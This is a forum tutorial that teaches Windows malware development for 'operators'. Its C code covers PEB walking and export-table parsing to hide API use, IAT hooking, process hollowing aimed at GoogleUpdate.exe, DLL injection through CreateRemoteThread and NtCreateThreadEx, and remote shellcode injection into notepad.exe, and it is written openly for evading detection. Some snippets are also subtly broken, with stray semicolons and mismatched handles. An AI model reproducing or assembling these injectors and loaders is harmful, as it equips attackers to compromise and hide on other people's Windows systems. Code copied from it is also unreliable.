Malware Development Essentials for Operators

0xf00I · November 8, 2023, 2:33am

Introduction

This article will delve into fundamental and techniques related to malware development for Windows OS, We’ll start by exploring the WinAPI, understanding how code manipulation works in the context of malware development. We’ll cover things like loading functions dynamically, accessing the Process Environment Block (PEB), and executing functions in code, Next we’ll look into obfuscation and payload encoding. We’ll use techniques like XOR and AES encryption to make our malicious code harder to detect. We’ll also explore ways to insert our malicious code, like using classic shellcode and DLL injections To wrap things up, we’ll create a simple rootkit, concluding our journey through the world of malware development, As usual, we will delve into the code and techniques, providing a detailed, step-by-step breakdown.

Dynamic Function Loading and Execution

Time to dive into some naked code action! We’re gonna break down this code and make it crystal clear, so you can get what’s going on.

int main(void) {
MessageBoxA(0, "Foo Here.", "info", 0);
return 0;
}

This is a simple program. It uses the MessageBoxA function, which is part of the Windows API. This function displays a modal dialog box with specified text and a caption. In this code, we’re making a straightforward call to the MessageBoxA function to show a message box.

The MessageBoxA function is statically linked to your program during the compilation process. This means that the function’s code is included in your program, so you don’t need to load it at runtime.

Now, let’s contrast this with the following code:

int main(void) {
size_t get_MessageBoxA = (size_t)GetProcAddress( LoadLibraryA("USER32.dll"), "MessageBoxA" );
def_MessageBoxA msgbox_a = (def_MessageBoxA) get_MessageBoxA;
msgbox_a(0, "Foo Here.", "info", 0);
return 0;
}

In this code, we take a different approach. We dynamically load and call the MessageBoxA function using the GetProcAddress function. This function retrieves the address of the MessageBoxA function from the USER32.dll library at runtime.

To work with this dynamically loaded function, we define a function pointer type def_MessageBoxA that matches the signature of the MessageBoxA function. We then cast the obtained function address to this function pointer and use it to call the function.

So, how is this related to malware? Well, by dynamically loading functions, we can avoid having to statically link to libraries that are associated with shady activity, meaning that hooking a function dynamically with the use of pointers can make it more challenging for static analysis tools to identify the behavior of the code. Let’s Take an example:

__declspec(dllexport) void func01() { MessageBoxA(0, "", "Function 1", 0); }
__declspec(dllexport) void func02() { MessageBoxA(0, "", "Function 2", 0); }

BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpReserved) {
    if (fdwReason == DLL_PROCESS_ATTACH) {
        // Hook function func01
    }
    return TRUE;
}

In this example, we have a DLL with two exported functions, func01 and func02. Initially, both functions display message boxes. However, in the DllMain function, which is automatically executed when the DLL is loaded may start with benign functionality but could use dynamic function loading and function hooking to change the behavior of func01 at runtime. So, let’s continue on this code manipulation journey, exploring the intricacies of dynamic function loading, PEB access, and function execution, which are essential concepts in understanding how code can be adapted and manipulated.

Before, continuing I would like to highlight in which step PEB is created on process creation When Starting a program (calc.exe for example): calc.exe will call a win32 API function : CreateProcess which sends to the OS the request to create this process and start the execution.

Creating the process data structures: Windows creates the process structure EPROCESS on kernel land for the newly created calc.exe process, Initialize the virtual memory: Then, Windows creates the process, virtual memory, and its representation of the physical memory and saves it inside the EPROCESS structure, creates the PEB structure with all necessary information, and then loads the main two DLLs that Windows applications will always need, which are ntdll.dll and kernel32.dll and finally loading the PE file and start the execution.

PEB can be accessed from User Mode - Contains Process specific information
EPROCESS can be only be accessed from Kernel Mode

PEB Structure

PEB is a data structure in the Windows operating system that contains information and settings related to a running process, The process control block contains data that is only useful to the kernel, such as the preferred CPU for this process. The Thread Control Block is entirely different, and is what the kernel uses to manage threads, which are what the kernel runs at the lowest level.

the PEB is accessed to retrieve information about loaded modules, specifically the base addresses of dynamically linked libraries (DLLs). Let’s explore how the PEB is used in the code:

typedef struct _PEB_LDR_DATA {
ULONG Length;
UCHAR Initialized;
PVOID SsHandle;
LIST_ENTRY InLoadOrderModuleList;
LIST_ENTRY InMemoryOrderModuleList;
LIST_ENTRY InInitializationOrderModuleList;
PVOID EntryInProgress;
} PEB_LDR_DATA, *PPEB_LDR_DATA; 

typedef struct _UNICODE_STRING32 {
USHORT Length;
USHORT MaximumLength;
PWSTR Buffer;
} UNICODE_STRING32, *PUNICODE_STRING32;

typedef struct _PEB32 {
    // ...
} PEB32, *PPEB32;

typedef struct _PEB_LDR_DATA32 {
    // ...
} PEB_LDR_DATA32, *PPEB_LDR_DATA32;

typedef struct _LDR_DATA_TABLE_ENTRY32 {
    // ...
} LDR_DATA_TABLE_ENTRY32, *PLDR_DATA_TABLE_ENTRY32;

As you can see, the PEB is a robust structure. The code defines several structures, such as PEB32, PEB_LDR_DATA32, and LDR_DATA_TABLE_ENTRY32, which are simplified versions of the actual PEB data structures. These structures contain fields that hold information about loaded modules and their locations in memory.

size_t GetModHandle(wchar_t *libName) {
PEB32 *pPEB = (PEB32 *)__readfsdword(0x30); // ds: fs[0x30]
PLIST_ENTRY header = &(pPEB->Ldr->InMemoryOrderModuleList);

for (PLIST_ENTRY curr = header->Flink; curr != header; curr = curr->Flink) {
LDR_DATA_TABLE_ENTRY32 *data = CONTAINING_RECORD(
curr, LDR_DATA_TABLE_ENTRY32, InMemoryOrderLinks

);
printf("current node: %ls\n", data->BaseDllName.Buffer);
if (StrStrIW(libName, data->BaseDllName.Buffer))
return data->DllBase;
}
return 0;
}

The GetModHandle function accesses the PEB to find the base address of a loaded module. The PEB contains a data structure called PEB_LDR_DATA that manages information about loaded modules. The InMemoryOrderModuleList field of this structure is a linked list of loaded modules. The GetModHandle function iterates through this list and compares module names to find the desired module based on the libName parameter.

The PEB can be found at fs:[0x30] in the Thread Environment Block for x86 processes as well as at GS:[0x60] for x64 processes.

Next we call the GetFuncAddrfunction which well be used to locate the address of a specific function within a loaded module. It takes the moduleBase parameter, which is the base address of the module, and it looks into the export table of the module to find the address of the function with the specified name (szFuncName). The export table is part of the module’s data structure, which is managed by the PEB.

size_t GetFuncAddr(size_t moduleBase, char* szFuncName) {

// parse export table
PIMAGE_DOS_HEADER dosHdr = (PIMAGE_DOS_HEADER)(moduleBase);
PIMAGE_NT_HEADERS ntHdr = (PIMAGE_NT_HEADERS)(moduleBase + dosHdr->e_lfanew);
IMAGE_OPTIONAL_HEADER optHdr = ntHdr->OptionalHeader;
IMAGE_DATA_DIRECTORY dataDir_exportDir = optHdr.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT];

// parse exported function info

PIMAGE_EXPORT_DIRECTORY exportTable = (PIMAGE_EXPORT_DIRECTORY)(moduleBase + dataDir_exportDir.VirtualAddress);
DWORD* arrFuncs = (DWORD *)(moduleBase + exportTable->AddressOfFunctions);
DWORD* arrNames = (DWORD *)(moduleBase + exportTable->AddressOfNames);
WORD* arrNameOrds = (WORD *)(moduleBase + exportTable->AddressOfNameOrdinals);

The function begins by parsing the export table of the loaded module to access information about its exported functions. The export table is part of the Portable Executable (PE) file format and contains details about functions that can be accessed externally.

accesses the DOS header and the NT header to navigate to the Optional Header of the PE file.
identifies the data directory for exports using the IMAGE_DIRECTORY_ENTRY_EXPORT index from the Optional Header’s data directory array.
calculates the address of the export table, which holds data related to the module’s exported functions.

Next, inside the loop, it compares the current exported function’s name (sz_CurrApiName) with the target function name (szFuncName) using a case-insensitive comparison. When a match is found, the function prints information about the matching function, including its name and ordinal.

// lookup
for (size_t i = 0; i < exportTable->NumberOfNames; i++) {
char* sz_CurrApiName = (char *)(moduleBase + arrNames[i]);
WORD num_CurrApiOrdinal = arrNameOrds[i] + 1;
if (!stricmp(sz_CurrApiName, szFuncName)) {
printf("[+] Found ordinal %.4x - %s\n", num_CurrApiOrdinal, sz_CurrApiName); //enumeration process 
return moduleBase + arrFuncs[ num_CurrApiOrdinal - 1 ];
}
}
return 0;
}

If the target function name matches the current function name, the function returns the address of that function. It calculates the function’s address by referencing the arrFuncs array and the ordinal. The ordinal, when converted to an index, helps retrieve the correct address from the array.

Why is This Important this technique is usually how code injection is preformed and yes dynamic function loading, now Let’s take a look at main function.

int main(int argc, char** argv, char* envp) {
    size_t kernelBase = GetModHandle(L"kernel32.dll");
    printf("[+] GetModHandle(kernel32.dll) = %p\n", kernelBase); // result of the `GetModHandle` 
    
    size_t ptr_WinExec = (size_t)GetFuncAddr(kernelBase, "WinExec");
    printf("[+] GetFuncAddr(kernel32.dll, WinExec) = %p\n", ptr_WinExec); // the address of the `WinExec`
    ((UINT(WINAPI*)(LPCSTR, UINT))ptr_WinExec)("calc", SW_SHOW); 
    return 0;
}

We calls the GetModHandle function to find the base address of the “kernel32.dll” module in the current process. It uses the PEB to traverse the list of loaded modules and search for the one with the specified name (“kernel32.dll”), Next we calls the GetFuncAddr to locate the address of the WinExec, passes the base address of “kernel32.dll” obtained in the previous step and the function name “WinExec” as arguments and Finally, the code dynamically invokes the WinExec function using the address obtained earlier. It casts the ptr_WinExec to the appropriate function pointer type and calls it with the arguments “calc” (to run the Windows Calculator) and SW_SHOW

Demonstrates how to dynamically locate and execute the WinExec function from the “kernel32.dll” module, effectively opening the Calculator This shows how code manipulation can be achieved by accessing the PEB and locating and using specific functions from loaded modules.

Alright let’s back up a little bit here “Code Injection” Here’s the section to explain and explore further in the context of code injection:

((UINT(WINAPI*)(LPCSTR, UINT))ptr_WinExec)("calc", SW_SHOW);

This line dynamically invokes the WinExec function to open the Windows Calculator. Now, let’s break down what’s happening here:

(UINT(WINAPI*)(LPCSTR, UINT))ptr_WinExec involves typecasting the ptr_WinExec pointer into a function pointer with the appropriate signature. This typecasting is crucial to match the required parameters of the WinExec function, which includes a string (LPCSTR) and an integer (UINT).
("calc", SW_SHOW) represents the arguments passed to the WinExec function. In this instance, it instructs the system to open the Windows Calculator (“calc”) with a specified display mode (SW_SHOW).

In essence, what’s occurring here is:

The code dynamically injects the execution of the WinExec function into the context of a legitimate process. Rather than statically linking to the WinExec function, this code locates and invokes it dynamically. Dynamic function loading is a technique often employed in malware to access specific functions without the need for direct imports, making it more evasive.

It’s important to note that in this code example, opening the Windows Calculator is a benign action. However, it serves as an illustrative case of code injection and dynamic function invocation.

Dynamic Function Loading (IAT Hooking)

Dynamic Function Loading is a technique used in the realm of Windows programming and sometimes in malware development to load and execute functions at runtime. One way to achieve this is through “Import Address Table (IAT) Hooking.” The IAT contains the addresses of functions that a module (such as a DLL or executable) imports from other modules. IAT hooking allows us to intercept and modify function calls by manipulating the IAT.

IAT table looks something like:

                Application                                               mydll
           +-------------------+                                  +--------------------+
           |                   |                                  |       MessageBoxA  |
           |                   |                    +------------>---------------------+
           | call MessageBoxA  |               IAT  |             |  ....              |
           |                   |       +-------------------+      |(kernel32!MsgBoxA)  |
           +-------------------+       |            |      |      |  ....              |
                             +----------> jmp       +      |      +--------------------+
                                       |                   |      |                    |
                                       +-------------------+      +--------------------+

First the target program calls a WinAPI MessageBoxA function, the program looks up the MessageBoxA address in the IAT and code execution jumps to the kernel32!MessageBoxA address resolved in step 2 where legitimate code for displaying the MessageBoxA , Here’s how the IAT table works in the context of a call to a function like MessageBoxA:

#define getNtHdr(buf) ((IMAGE_NT_HEADERS *)((size_t)buf + ((IMAGE_DOS_HEADER *)buf)->e_lfanew))
#define getSectionArr(buf) ((IMAGE_SECTION_HEADER *)((size_t)buf + ((IMAGE_DOS_HEADER *)buf)->e_lfanew + sizeof(IMAGE_NT_HEADERS))

The application code makes a function call to MessageBoxA. This call is typically made using a function or API from a Windows library, When the application code makes a function call, it does not directly call the function’s code. Instead, it looks up the address of the function in the IAT, which contains entries for various imported functions. Once the address of MessageBoxA is resolved in the IAT, the code execution jumps to that resolved address. In this case, the resolved address points to the legitimate kernel32!MessageBoxA function.

size_t ptr_msgboxa = 0;
void iatHook(char *module, const char *szHook_ApiName, size_t callback, size_t &apiAddr)
{
    auto dir_ImportTable = getNtHdr(module)->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT];
    auto impModuleList = (IMAGE_IMPORT_DESCRIPTOR *)&module[dir_ImportTable.VirtualAddress];
    for (; impModuleList->Name; impModuleList++)
    {
        auto arr_callVia = (IMAGE_THUNK_DATA *)&module[impModuleList->FirstThunk];
        auto arr_apiNames = (IMAGE_THUNK_DATA *)&module[impModuleList->OriginalFirstThunk];
        for (int i = 0; arr_apiNames[i].u1.Function; i++)
        {
            auto curr_impApi = (PIMAGE_IMPORT_BY_NAME)&module[arr_apiNames[i].u1.Function];
            if (!strcmp(szHook_ApiName, (char *)curr_impApi->Name))
            {
                apiAddr = arr_callVia[i].u1.Function;
                arr_callVia[i].u1.Function = callback;
                break;
            }
        }
    }
}

int main(int argc, char **argv)
{
    void (*ptr)(UINT, LPCSTR, LPCSTR, UINT) = [](UINT hwnd, LPCSTR lpText, LPCSTR lpTitle, UINT uType) {
        printf("[hook] MessageBoxA(%i, \"%s\", \"%s\", %i)", hwnd, lpText, lpTitle, uType);
        ((UINT(*)(UINT, LPCSTR, LPCSTR, UINT))ptr_msgboxa)(hwnd, "msgbox got hooked", "alert", uType);
    };

    iatHook((char *)GetModuleHandle(NULL), "MessageBoxA", (size_t)ptr, ptr_msgboxa);
    MessageBoxA(0, "Hook Test", "title", 0);
    return 0;
}

So What’s Going on Here? Instead of executing the legitimate kernel32!MessageBoxA function, the IAT entry for MessageBoxA is modified to point to a replacement function (the ptr function in the code). As a result, when the application makes a call to MessageBoxA, it actually calls the replacement function, which can alter or extend the behavior of the original function call.

Process Hollowing

So, Process hollowing is a technique that begins with the creation of a new instance of a legitimate process in a suspended state, The suspended state allows the injected code to be executed within the context of this process.

To successfully perform process hollowing, the source image (the executable being injected into the legitimate process) must meet specific requirements and characteristics to ensure that the technique works effectively. These requirements include:

PE Format: The source image must be in the Portable Executable (PE) format, which is the standard executable file format on Windows. This format includes headers and sections that define the structure of the executable.
Executable Code: The source image should contain executable code that can be run by the Windows operating system. This code is typically located within the .text section of the PE file.
Address of Entry Point: The PE header of the source image must specify the address of the entry point, which is the starting point for the execution of the code. The address of the entry point is used to set the EAX register in the context of the suspended process.
Sections and Data: The source image should contain necessary sections, such as the .text section for code and other sections for data. These sections should be properly defined in the PE header, and the data should be accessible and relevant to the code’s execution.
Relocation Table: The source image may have a relocation table that allows it to be loaded at a different base address. If the source image lacks a relocation table, it may only work if it can be loaded at its preferred base address.

Creating The Process The target process must be created in the suspended state, The code aims to create a new instance of a process in a suspended state and subsequently replace its code and data with the code and data from another executable (the source image), which includes creating a suspended process and performing memory operations to load the new image.

// Create a new instance of current process in suspended state, for the new image.
if (CreateProcessA(path, 0, 0, 0, false, CREATE_SUSPENDED, 0, 0, &SI, &PI)) 
{
    // Allocate memory for the context.
    CTX = LPCONTEXT(VirtualAlloc(NULL, sizeof(CTX), MEM_COMMIT, PAGE_READWRITE));
    CTX->ContextFlags = CONTEXT_FULL; // Context is allocated

    // Retrieve the context.
    if (GetThreadContext(PI.hThread, LPCONTEXT(CTX))) //if context is in thread
    {
        pImageBase = VirtualAllocEx(PI.hProcess, LPVOID(NtHeader->OptionalHeader.ImageBase),
            NtHeader->OptionalHeader.SizeOfImage, 0x3000, PAGE_EXECUTE_READWRITE);

        // File Mapping
        WriteProcessMemory(PI.hProcess, pImageBase, Image, NtHeader->OptionalHeader.SizeOfHeaders, NULL);
        for (int i = 0; i < NtHeader->FileHeader.NumberOfSections; i++)
            WriteProcessMemory
            (
                PI.hProcess, 
                LPVOID((size_t)pImageBase + SectionHeader[i].VirtualAddress),
                LPVOID((size_t)Image + SectionHeader[i].PointerToRawData), 
                SectionHeader[i].SizeOfRawData, 
                0
            );
    }
}

Alright CreateProcessA function is used to create a new instance of the current process (or another specified executable) in a suspended state. The CREATE_SUSPENDED flag is used to create the process in a suspended state, meaning its execution is paused, After creating the suspended process, memory is allocated using VirtualAlloc to hold the context of the suspended process. The context structure (CTX) is used to capture information about the process’s execution state.

Retrieving and Updating Context

GetThreadContext function is called to retrieve the context of the suspended process’s main thread (PI.hThread). The context is stored in the CTX structure.
The context is updated to prepare for the execution of the new code. Specifically, the EAX register is set to the address of the entry point of the new code, Next the code then proceeds to copy the headers (PE header) of the source image into the allocated memory within the suspended process using WriteProcessMemory. This is crucial for ensuring that the new image is loaded correctly, A loop iterates through the sections of the source image (SectionHeader) and copies the section data from the source image to corresponding memory locations within the suspended process using WriteProcessMemory. This step is essential to load the code and data.

At this point, the process hollowing process is set up, and the new image’s code and data have been loaded into the memory of the suspended process. The code execution will continue from this point, allowing the new image to execute within the context of the suspended process.

WriteProcessMemory(PI.hProcess, LPVOID(CTX->Ebx + 8), LPVOID(&pImageBase), 4, 0);
CTX->Eax = DWORD(pImageBase) + NtHeader->OptionalHeader.AddressOfEntryPoint;
SetThreadContext(PI.hThread, LPCONTEXT(CTX)); 
ResumeThread(PI.hThread);

The destination address is calculated as CTX->Ebx + 8, and 4 bytes of data are written. This memory write operation sets the location where the process should begin execution of the new code.

CTX->Eax is updated with the address of the new code’s entry point. This effectively sets the instruction pointer (EIP) to the starting point of the loaded code. The entry point address is obtained from the PE header of the source image: NtHeader->OptionalHeader.AddressOfEntryPoint. Finally, the ResumeThread function is called to resume the execution of the suspended process. At this point, the process begins executing the injected code, starting from the entry point that was set, The injected code within the suspended process will now take control of the process’s execution.

char CurrentFilePath[MAX_PATH + 1];
GetModuleFileNameA(0, CurrentFilePath, MAX_PATH);
if (strstr(CurrentFilePath, "GoogleUpdate.exe")) {
MessageBoxA(0, "foo", "", 0);
return 0;

LONGLONG len = -1;
RunPortableExecutable("GoogleUpdate.exe", MapFileToMemory(CurrentFilePath, len));
return 0;
}

Once the application is run is used to retrieve the full path of the currently running executable (the application itself), There is a conditional check using strstr to examine the CurrentFilePath. If the file path contains “GoogleUpdate.exe,” it displays a message box with the title and the message “foo” using the MessageBoxA function, If the file path doesn’t match the condition, the code continues to execute. It proceeds to call the RunPortableExecutable function, The target process for process hollowing is specified as “GoogleUpdate.exe.” It passes the source image, Otherwise, it proceeds with the process hollowing technique to inject and run code from another executable. This is a simple example.

DLL injection Techniques

DLL injection is the act of introducing code into a currently executing process. Typically, the code we introduce takes the form of a dynamic link library (DLL) since DLLs are designed to be loaded as needed during runtime. However, this doesn’t preclude us from injecting assembly code or other forms of code (such as executables or handwritten code). It’s crucial to bear in mind that you must possess the necessary level of privileges on the system to engage in memory manipulation within other programs.

The Windows API provides a range of functions that enable us to attach to and manipulate other programs, primarily for debugging purposes. We will make use of these methods to execute DLL injection. I’ve divided the DLL injection process into four distinct steps:

Attach to the process
Allocate Memory within the process
Copy the DLL or the DLL Path into the processes memory and determine appropriate memory addresses
Instruct the process to Execute your DLL

Each one of these steps can be accomplished through the use of one or more programming techniques which are summarized in the below graphic. It’s important to understand the details/options present for each technique as they all have their positives and negatives.

LoadLibrary: Using the LoadLibrary function to load a DLL into a process.
CreateRemoteThread: Injecting a DLL using the CreateRemoteThread function.
SetWindowsHookEx: Using Windows hooks to inject code into other processes.
Process Hollowing: Replacing the code and data of a legitimate process with a malicious DLL.

We have a couple of options (e.g. CreateRemoteThread(),NtCreateThreadEx(), etc…) when instructing the target process to launch our DLL. Unfortunately we can’t just provide the name of our DLL to these functions, instead we have to provide a memory address to start execution at. We perform the Allocate and Copy steps to obtain space within the target process’ memory and prepare it as an execution starting point.

There are two popular starting points: LoadLibraryA() and jumping to DllMain.

`LoadLibraryA()`

LoadLibraryA() is a kernel32.dll function used to load DLLs, executables, and other supporting libraries at run time. It takes a filename as its only parameter and magically makes everything work. This means that we just need to allocate some memory for the path to our DLL and set our execution starting point to the address of LoadLibraryA(), providing the memory address where the path lies as a parameter.

The major downside to LoadLibraryA() is that it registers the loaded DLL with the program and thus can be easily detected. Another slightly annoying caveat is that if a DLL has already been loaded once with LoadLibraryA(), it will not execute it. You can work around this issue but it’s more code.

Jumping to `DllMain` (or another entry point)

An alternative method to LoadLibraryA() is load the entire DLL into memory, then determine the offset to the DLL’s entry point. Using this method you can avoid registering the DLL with the program (stealthy) and repeatedly inject into a process.

Attaching to the Process

First we’ll need a handle to the process so that we can interact with it. This is done with the OpenProcess() function. We’ll also need request certain access rights in order for us to perform the tasks below. The specific access rights we request vary across Windows versions, however the following should work for most:

hHandle = OpenProcess( PROCESS_CREATE_THREAD | 
                       PROCESS_QUERY_INFORMATION | 
                       PROCESS_VM_OPERATION | 
                       PROCESS_VM_WRITE | 
                       PROCESS_VM_READ, 
                       FALSE, 
                       procID );

Before we can inject anything into another process, we’ll need a place to put it. We’ll use the VirtualAllocEx() function to do so.

VirtualAllocEx() takes amount of memory to allocate as one of its parameters. If we use LoadLibraryA(), we’ll allocate space for the full path of the DLL and if we jump to the DllMain, we’ll allocate space for the DLL’s full contents.

DLL Path

Allocating space for just the DLL path slightly reduces the amount of code you’ll need to write but not by much. It also requires you to use the LoadLibraryA() method which has some downsides (described above). That being said, it is a very popular method.

Use VirtualAllocEx() and allocate enough memory to support a string which contains the path to the DLL:

GetFullPathName(TEXT("foo.dll"), 
                BUFSIZE, 
                dllPath, //Output to save the full DLL path
                NULL);

dllPathAddr = VirtualAllocEx(hHandle, 
                             0, 
                             strlen(dllPath), 
                             MEM_RESERVE|MEM_COMMIT, 
                             PAGE_EXECUTE_READWRITE);

Full DLL

Allocating space for the full DLL requires a little more code however it’s also much more reliable and doesn’t need to use LoadLibraryA().

First, open a handle to the DLL with CreateFileA() then calculate its size with GetFileSize() and pass it to VirtualAllocEx():


GetFullPathName(TEXT("foo.dll"), 
                BUFSIZE, 
                dllPath, //Output to save the full DLL path
                NULL);

hFile = CreateFileA( dllPath, 
                     GENERIC_READ, 
                     0, 
                     NULL, 
                     OPEN_EXISTING, 
                     FILE_ATTRIBUTE_NORMAL, 
                     NULL );

dllFileLength = GetFileSize( hFile, 
                             NULL );

remoteDllAddr = VirtualAllocEx( hProcess, 
                                NULL, 
                                dllFileLength, 
                                MEM_RESERVE|MEM_COMMIT, 
                                PAGE_EXECUTE_READWRITE );

Now that we have space allocated in our target process, we can copy our DLL Path or the Full DLL (depending on the method you choose) into that process. We’ll use WriteProcessMemory() to do so:

DLL Path


WriteProcessMemory(hHandle, 
                   dllPathAddr, 
                   dllPath, 
                   strlen(dllPath), 
                   NULL);

Full DLL

We’ll first need to read our DLL into memory before we copy it to the remote processes.


lpBuffer = HeapAlloc( GetProcessHeap(), 
                      0, 
                      dllFileLength); 

ReadFile( hFile, 
          lpBuffer, 
          dllFileLength, 
          &dwBytesRead;, 
          NULL );

WriteProcessMemory( hProcess, 
                    lpRemoteLibraryBuffer, 
                    lpBuffer,  
                    dllFileLength, 
                    NULL );

Determining our Execution Starting Point

Most execution functions take a memory address to start at, so we’ll need to determine what that will be.

DLL Path and `LoadLibraryA()`

We’ll search our own process memory for the starting address of LoadLibraryA(), then pass it to our execution function with the memory address of DLL Path as it’s parameter. To get LoadLibraryA()'s address, we’ll use GetModuleHandle() and GetProcAddress():

loadLibAddr = GetProcAddress(GetModuleHandle(TEXT("kernel32.dll")), "LoadLibraryA");

Full DLL and Jump to `DllMain`

By copying the entire DLL into memory we can avoid registering our DLL with the process and more reliably inject. The somewhat difficult part of doing this is obtaining the entry point to our DLL when it’s loaded in memory. So we’ll use the GetReflectiveLoaderOffset() from it to determine our offset in our processes memory then use that offset plus the base address of the memory in the victim process we wrote our DLL to as the execution starting point. It’s important to note here that the DLL we’re injecting must complied with the appropriate includes and options so that it aligns itself with the ReflectiveDLLInjection method.

dwReflectiveLoaderOffset = GetReflectiveLoaderOffset(lpWriteBuff);

Executing the DLL!

At this point we have our DLL in memory and we know the memory address we’d like to start execution at. All that’s really left is to tell our process to execute it. There are a couple of ways to do this.

`CreateRemoteThread()`

The CreateRemoteThread() function is probably the most widely known and used method. It’s very reliable and works most times however you may want to use another method to avoid detection or if Microsoft changes something to cause CreateRemoteThread() to stop working.

Since CreateRemoteThread() is a very established function, you have a greater flexibility in how you use it. For instance, you can do things like use Python to do DLL injection!

rThread = CreateRemoteThread(hTargetProcHandle, NULL, 0, lpStartExecAddr, lpExecParam, 0, NULL);
WaitForSingleObject(rThread, INFINITE);

`NtCreateThreadEx()`

NtCreateThreadEx() is an undocumented ntdll.dll function. The trouble with undocumented functions is that they may disappear or change at any moment Microsoft decides. That being said, NtCreateThreadEx() came in good handy when Windows session separation affected CreateRemoteThread() DLL injection.

NtCreateThreadEx() is a bit more complicated to call, we’ll need a specific structure to pass to it and another to receive data from it. I’ve detailed the implementation here:

struct NtCreateThreadExBuffer {
 ULONG Size;
 ULONG Unknown1;
 ULONG Unknown2;
 PULONG Unknown3;
 ULONG Unknown4;
 ULONG Unknown5;
 ULONG Unknown6;
 PULONG Unknown7;
 ULONG Unknown8;
 }; 


typedef NTSTATUS (WINAPI *LPFUN_NtCreateThreadEx) (
 OUT PHANDLE hThread,
 IN ACCESS_MASK DesiredAccess,
 IN LPVOID ObjectAttributes,
 IN HANDLE ProcessHandle,
 IN LPTHREAD_START_ROUTINE lpStartAddress,
 IN LPVOID lpParameter,
 IN BOOL CreateSuspended,
 IN ULONG StackZeroBits,
 IN ULONG SizeOfStackCommit,
 IN ULONG SizeOfStackReserve,
 OUT LPVOID lpBytesBuffer
);

HANDLE bCreateRemoteThread(HANDLE hHandle, LPVOID loadLibAddr, LPVOID dllPathAddr) {

 HANDLE hRemoteThread = NULL;

 LPVOID ntCreateThreadExAddr = NULL;
 NtCreateThreadExBuffer ntbuffer;
 DWORD temp1 = 0; 
 DWORD temp2 = 0; 

 ntCreateThreadExAddr = GetProcAddress(GetModuleHandle(TEXT("ntdll.dll")), "NtCreateThreadEx");

 if( ntCreateThreadExAddr ) {
 
  ntbuffer.Size = sizeof(struct NtCreateThreadExBuffer);
  ntbuffer.Unknown1 = 0x10003;
  ntbuffer.Unknown2 = 0x8;
  ntbuffer.Unknown3 = &temp2;
  ntbuffer.Unknown4 = 0;
  ntbuffer.Unknown5 = 0x10004;
  ntbuffer.Unknown6 = 4;
  ntbuffer.Unknown7 = &temp1;
  ntbuffer.Unknown8 = 0;

  LPFUN_NtCreateThreadEx funNtCreateThreadEx = (LPFUN_NtCreateThreadEx)ntCreateThreadExAddr;
  NTSTATUS status = funNtCreateThreadEx(
          &hRemoteThread;,
          0x1FFFFF,
          NULL,
          hHandle,
          (LPTHREAD_START_ROUTINE)loadLibAddr,
          dllPathAddr,
          FALSE,
          NULL,
          NULL,
          NULL,
          &ntbuffer;
          );
  
  if (hRemoteThread == NULL) {
   printf("\t[!] NtCreateThreadEx Failed! [%d][%08x]\n", GetLastError(), status);
   return NULL;
  } else {
   return hRemoteThread;
  }
 } else {
  printf("\n[!] Could not find NtCreateThreadEx!\n");
 }
 return NULL;

}

Now we can call it very much like CreateRemoteThread():

rThread = bCreateRemoteThread(hTargetProcHandle, lpStartExecAddr, lpExecParam);
WaitForSingleObject(rThread, INFINITE);

Shellcode Execution Techniques

Now, let’s dive into the world of ‘injections.’, we’ll begin with some benign code that leverages Win32 APIs. We’ll examine how it functions at a fundamental level and then transition toward more evil code, aiming to bypass these APIs and arrive at a more malicious outcome, Sounds Good So Check This out:

int main(void){

    STARTUPINFOW si = {0};
    PROCESS_INFORMATION pi = {0};

    if(!CreateProcessW(
        L"C:\\Windows\\System32\\notepad.exe",
        NULL,
        NULL,
        NULL,
        FALSE,
        BELOW_NORMAL_PRIORITY_CLASS,
        NULL,
        NULL,
        &si,
        &pi
)){
        printf("(-) failed to create process, error: %ld", GetLastError());
        return EXIT_FAILURE;
    }

    printf("(+) process started! PID:%ld", pi.dwProcessId);
    return EXIT_SUCCESS;
}

What’s the purpose of this code, you may wonder? You likely have an inkling already, don’t you? Well, we’re initiating a fresh Notepad process. Let me assure you, there’s nothing shady about this code it’s entirely above board and legitimate. We’re utilizing the ‘CreateProcessW’ function, which is all about orchestrating the precise way a new process should be launched. You provide it with a set of parameters, and voilà, a new process comes to life.

BOOL CreateProcessW(
  [in, optional]      LPCWSTR               lpApplicationName,
  [in, out, optional] LPWSTR                lpCommandLine,
  [in, optional]      LPSECURITY_ATTRIBUTES lpProcessAttributes,
  [in, optional]      LPSECURITY_ATTRIBUTES lpThreadAttributes,
  [in]                BOOL                  bInheritHandles,
  [in]                DWORD                 dwCreationFlags,
  [in, optional]      LPVOID                lpEnvironment,
  [in, optional]      LPCWSTR               lpCurrentDirectory,
  [in]                LPSTARTUPINFOW        lpStartupInfo,
  [out]               LPPROCESS_INFORMATION lpProcessInformation
);

Now, let’s take a deeper look into our coding journey. We’re not inventing something entirely new; instead, we’re refining existing code droppers and loaders for Windows targets, making them responsive to our session commands.

Our goal here is to run unrestricted shellcode. Our toolkit includes familiar Windows API functions: ‘OpenProcess,’ ‘VirtualAllocEx,’ ‘WriteProcessMemory,’ and ‘CreateRemoteThread.’ Think of it as conducting an orchestra, where each function plays a specific role in enabling the shellcode to do its job. We’re in charge, and the Windows targets should be ready to follow our instructions.

Injection

int main()
{
    STARTUPINFOW si = {0};
    PROCESS_INFORMATION pi = {0};
    
(!CreateProcessW(
        L"C:\\Windows\\System32\\notepad.exe",
        NULL,
        NULL,
        NULL,
        FALSE,
        BELOW_NORMAL_PRIORITY_CLASS,
        NULL,
        NULL,
        &si,
        &pi
));
  
  char shellcode[] ={
  };

    HANDLE hProcess; 
    HANDLE hThread;
    void*exec_mem;
    hProcess = OpenProcess(PROCESS_ALL_ACCESS,TRUE,pi.dwProcessId);
    exec_mem = VirtualAllocEx(hProcess, NULL, sizeof(shellcode), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    WriteProcessMemory(hProcess, exec_mem, shellcode, sizeof(shellcode), NULL);
    hThread = CreateRemoteThread(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)exec_mem, NULL,0,0);
    CloseHandle(hProcess);
    return 0;
}

Alright, do you notice any differences? Bingo, there’s “shellcode.” Let me clarify; the initial code segment was straightforward, mainly focusing on creating a new process (Notepad) and adjusting its priority class. However, the code we’re dealing with now is more sinister, as it centers around remote process injection and the implementation of functions such as OpenProcess, VirtualAllocEx, WriteProcessMemory, and CreateRemoteThread to allocate memory within a target process and execute custom shellcode within it.

